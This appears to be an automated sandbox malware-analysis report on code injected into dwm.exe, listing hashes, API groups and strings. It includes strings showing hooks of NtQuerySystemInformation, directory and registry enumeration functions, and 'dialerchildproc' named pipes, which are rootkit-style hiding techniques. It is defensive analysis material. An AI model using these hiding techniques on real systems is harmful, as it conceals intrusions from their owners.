                                                                          • Opcode ID: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction ID: f6878b2950e9d4e6303fdb8e4c2bad55c8f75ea4604128ba6006891f042fd13a
                                                                          • Opcode Fuzzy Hash: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction Fuzzy Hash: C802A832619B8486EB64CB59E49479AB7A1F3C9794F104056FB8E87BA8DF7DC484CF00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 2ccc16f67b6c6c133aba7930fb0b1123e8ec8f16d7647dfb28198065f3b13e43
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: 6131DC3225AB8885EE789A15E0553DE66A4F3CC784F500565BBCE46BACDF7FC5C08B04

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 94d573ebf81321ba0a41e2ff60e5daec1efd8109dd9d15dde734bfa4c82e53cf
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: BD11927161174186FF6C9B21F8493DA2395BBDC745F9082A4BF56816BDEF7BD0C48200

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction ID: b82ecec3a8b0e105f91659d87c61f8a587773f5ff2df7cd8ef6e3d7e919a64c3
                                                                          • Opcode Fuzzy Hash: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction Fuzzy Hash: 31F01736218B4480D6349B05E4417DAABA0E3CCBD4F144151BF8D43B6DCF3EC6C08B00

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 49a3fc0d690aa98ce44f09e4a15faa2e81cecff9995125230278b8085bbda5de
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: DD610232B0179487DB58CF5D9100BEDB3A2FB58BA4F588261EF590778CDA39D892C700

                                                                          APIs
                                                                            • Part of subcall function 000001160CA41628: GetProcessHeap.KERNEL32 ref: 000001160CA41633
                                                                            • Part of subcall function 000001160CA41628: HeapAlloc.KERNEL32 ref: 000001160CA41642
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA416B2
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA416DF
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA416F9
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41719
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA41734
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41754
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA4176F
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA4178F
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA417AA
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA417CA
                                                                          • Sleep.KERNEL32 ref: 000001160CA41AD7
                                                                          • SleepEx.KERNELBASE ref: 000001160CA41ADD
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA417E5
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41805
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA41820
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41840
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA4185B
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA4187B
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA41896
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA418A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: e3bafb9313e350035a90d8361a1b72c5955b0a5c1bc76b2f6aa057d2aabfd231
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: D531C971210B4182FF58AB26DA413ED63A5ABCCBC4F0455A1BF09877ADFE26C8D2C211

                                                                          Control-flow Graph

                                                                          • Graph: basic blocks 1160ca42b2c-1160ca42f03 (executed / not-executed colouring not recoverable); API calls in graph: GetModuleHandleA, StrCmpNIW, lstrlenW; edge list omitted
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 7fddaefa59a8bf35f48f30940463c3a210b0ae04e3085f87a0a9d49c44080cb3
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: F5B15D72210B5086EBAD9F25D4407E967A5FB88B88F545296FF0993B99EF36CCC0C740
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 81b2c937ceaef623f5c34ebcb20b3667d0ecb988eff06867b5113627a990c405
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: AB314072215B808AEB649F60E8907ED7374F788744F44456AEF4E97B98EF39C688C710
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 47d4b0573420275bef55e6a4ec73ada5a95105225517eafdd6d8de0a8df5bcc0
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 76314932614B8086EB649F25E8403EE73A4F7897A8F504166FF9D43B99EF39C585CB00

                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: d2f923af1a3509ddc83667715395422f5fc2b433ff00cd748649d4cbc0394aba
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: ED512B76604B8486EB58CF62E5483EAB7A1F78DB99F448124EF4A07B58DF3DC085C700

                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 2d5a2e298f4ee84bcca8c96e84147e7409a3177502ebf4a921f87529f7dd87d3
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: A0319874900B4AA1FB0CEF69E9517D82321B78C348FC19593BF0A4257DAF7A86CAC350

                                                                          Control-flow Graph

                                                                          • Graph: basic blocks 1160ca16910-1160ca16c2c (executed / not-executed colouring not recoverable); named calls in graph: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c; edge list omitted
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: fb12948a7d96eb56a7b3f21a00e61c1f8b29a39e1b06b669b2594c85a0de5db6
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 3481EC317403018AFB5CAB6E98513D922E1EB8DB80F1885A5BF48C379EDB3BC9C58700

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001160CA4CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001160CA4CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001160CA4ECCC,?,?,?,?,000001160CA4BF9F,?,?,?,?,?,000001160CA47AB0), ref: 000001160CA4CF2C
                                                                            • Part of subcall function 000001160CA4D6CC: HeapAlloc.KERNEL32 ref: 000001160CA4D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF54
                                                                            • Part of subcall function 000001160CA4D744: HeapFree.KERNEL32 ref: 000001160CA4D75A
                                                                            • Part of subcall function 000001160CA4D744: GetLastError.KERNEL32 ref: 000001160CA4D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: f827660739d0ac8d8d24de68a73a3964859ee74960ffd1903c01c389e7f99321
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 22418F3030278446FE6CA77599563E962925BCC7B8F6407A4BF3A466EFDF2F84C18200
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: cdd4ff86511779fd0c9573889d0bb825dfaf229c40b7ad769213c07295287919
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: 6B213872614B4082FB18CB25E5443EA67A1F789BA5F908255FF9903BA8CF3DC189CB00
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 507866a2a6fc8ba6eab5877c5527049245992adbc793c09e3025b926bcece0c3
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: C1E19872604B808AEB689B79D4903DE77A0F789B98F040156FF8957B9ACB3AC5D1C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 382e1caebabbc5e426f8cd82ad255fea639d687bf281e2e0513fb49c9a6a1b0d
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 13E17972604B808AEB689F65D4803DE77A4F789B98F104156FF8957B9ACF3AC8D1D700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 6d2d6dc6cec25fe17a40349056cfc1752c4a0bb9243a60f64453e1439c99515e
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: BE41C332311B0095EA5ECBA6AC047D52391B78DBE0F499169BF0E8778CEF3AC4C59314
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 03ce57cd114804130c9852ef01246f36428961059f3e316ea8917a3e9eb338af
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 7A412772214B84C6E7A4CF25E4447DEB7A1F388B99F448129EB8A07B5CDF39C589CB40
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 3b2bff40e52c4bcaa2ff20759ca1e34918f246bdafde0a5395e5ee61b660fd40
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 10115E30B0478485FA6CA76999513EE62415BCC7F4F6453A4BF7A476EEDE2AC4C28200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 3ab010fe06b6ba36ebed80a57169feb58a53b4299650cbacd3f9e1c250fd0669
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 9081A0716007818AFA5CAB29A4413E96791A7CDB80F5484A5FF09C779EEF3BC8C5C740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 6cf8cbd426831905dd0babb9811bc8e6eccaf663127cea74c340ac0b50481afb
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 5831C831312B40E1EE59DB52A401BE723A8B78CBA0F594565FF1E47799DF3AC4D58300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 7336d4fea9467742800bdafd3e36f5cd0b2f13cd134b2de8d79b17c5e6b35272
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 5F115B32710F4086E7548B56E84439967A0F78CFE4F448264FF5A877A8CF39C9948740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: f8b7d8bc0e6cc4d4fc354021b252be388e9e71aaaa705bef59079470030ccb79
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: A7318E32701B5182EA59DF16E5407E9A7A0FB88B85F488264BF4947B69EF36C4E18700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 934748ede1297e97c92b6e1c0ca6694779cbb889be3b4c5dad1e80a11171dfc6
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: 08117C3070578086FA6CA775A9453ED62426BCC7F4F6447A4BF3A477EEDE2A84C29200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: e00dd36680488c5e306854b294cb669450076414ac262b156d1663c76e65602a
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
